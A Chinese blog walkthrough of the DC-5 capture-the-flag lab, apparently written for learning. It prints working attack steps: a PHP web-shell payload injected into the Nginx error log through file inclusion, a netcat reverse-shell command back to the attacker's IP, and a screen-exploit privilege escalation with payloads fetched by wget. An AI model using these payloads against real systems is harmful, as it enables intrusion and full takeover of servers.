当前位置:网站首页>DC-5靶场下载及渗透实战详细过程(DC靶场系列)

DC-5靶场下载及渗透实战详细过程(DC靶场系列)

2022-08-03 03:37:00 金 帛

目录

一. 信息收集

1. 主机扫描

2. 端口扫描

3. 目录扫描

4. 页面信息探测

二. 渗透过程

1. 寻找包含文件的参数

2. Nginx日志文件包含

3. 反弹shell 

4. Linux提权

5. 找查flag

三. 收获总结

1. Nginx日志包含

2. 值得注意的事项

DC-5靶场下载地址https://www.five86.com/downloads/DC-5.zip

一. 信息收集

1. 主机扫描

2. 端口扫描

3. 目录扫描

扫描出了一个特别的

4. 页面信息探测

主页面没发现有啥,只知道用的中间件为Nginx

而这个页面,每次刷新版权标识年份都会随机变化

 这个页面也是随机变化,出现这种情况,可能是因为传参为空而默认包涵了本地下的footer.php文件,所以考虑到本地文件包含漏洞,当然也可能只是PHP脚本随机的结果

二. 渗透过程

1. 寻找包含文件的参数

为了验证文件包含的猜想,这里利用burpsuite爆破配合参数fuzz拆解

fuzz连接,https://github.com/TheKingOfDuck/fuzzDicts

我这边也上传在csdn了,0积分免费下载

web渗透通用fuzz字典(小而精)-网络安全文档类资源-CSDN文库

burpsuite抓包

设置好Positions爆破参数

加载刚才下载的参数fuzz,开始爆破

爆破得到file参数

2. Nginx日志文件包含

先查看一下Nginx的配置,构造payload

http://ip/thankyou.php?file=/etc/nginx/nginx.conf

开启了访问日志(access_log)和错误日志(error_log),这里我们看一下错误日志

http://ip/thankyou.php?file=/var/log/nginx/error.log

 得到了thankyou.php的目录,不难发现,传参错误的时候,会自动记录URL还有referer头在错误日志里,构造payload

/thankyou.php?mumua=<?php system($_GET[1])?>

这里记得用burpsuite重复器抓包发送,用浏览器传参会自动将<>转换成URL编码导致php执行失败

接着尝试一下命令执行

/thankyou.php?file=/var/log/nginx/error.log&1=whoami

任意命令执行成功!!!

3. 反弹shell 

构造payload

/thankyou.php?file=/var/log/nginx/error.log&1=nc -e /bin/bash 192.168.120.129 6666

反弹shell成功,升级为交互shell

python -c 'import pty; pty.spawn("/bin/bash")'

4. Linux提权

find / -perm -4000 -print 2>/dev/null

可以看到有两个特殊的命令,exim之前在DC-4的时候试过了,不能完全得到root权限,这里用screen作为突破口,用searchsploit工具搜索一下漏洞

searchsploit screen 4

将文件复制到桌面

cp  /usr/share/exploitdb/exploits/linux/local/41154.sh /root/桌面/exp.sh

开启http服务

python -m http.server 8888

接下来,我们以文本的形式打开exp.sh文件(因为靶机没有对应的命令,只能手工提取命令了)

根据提示,在桌面创建两个c文件

保存之后,在桌面打开终端,用gcc编译c文件

gcc -fPIC -shared -ldl -o libhax.so libhax.c
gcc -o rootshell rootshell.c

编译完后,再将这两个c文件删掉,文本让我们用rm命令,我们也可以自己删,接着我们修改exp.sh文件内容

将1到36行的内容全部删除并保存,留下cd /etc后面的命令,接着在/tmp目录下,下载这三个文件

cd /tmp

wget 192.168.120.129:8888/exp.sh

wget 192.168.120.129:8888/libhax.so

wget 192.168.120.129:8888/rootshell

文件下载完后,赋予exp文件权限并执行exp.sh

chmod 777 exp.sh

./exp.sh

提权成功

5. 找查flag

find / -name *flag.*

tac /root/this*

通过成功!!!

三. 收获总结

1. Nginx日志包含

①先查看配置文件,查看开启的日志

/etc/nginx/nginx.conf

②错误日志跟访问日志目录

/var/log/nginx/access.log
#访问日志
/var/log/nginx/error.log
#错误日志

③通过分析日志,包含木马

记得一定要用burpsuite进行测试,用浏览器会导致大于小于号被URL编码而无法正确识别PHP

2. 值得注意的事项

当目标靶机没有相关的命令时,可以自己分析sh文件,现在kali上完成一些重要的操作,然后手工提权

原网站

版权声明
本文为[金 帛]所创,转载请带上原文链接,感谢
https://blog.csdn.net/l2872253606/article/details/126062342

边栏推荐

猜你喜欢

随机推荐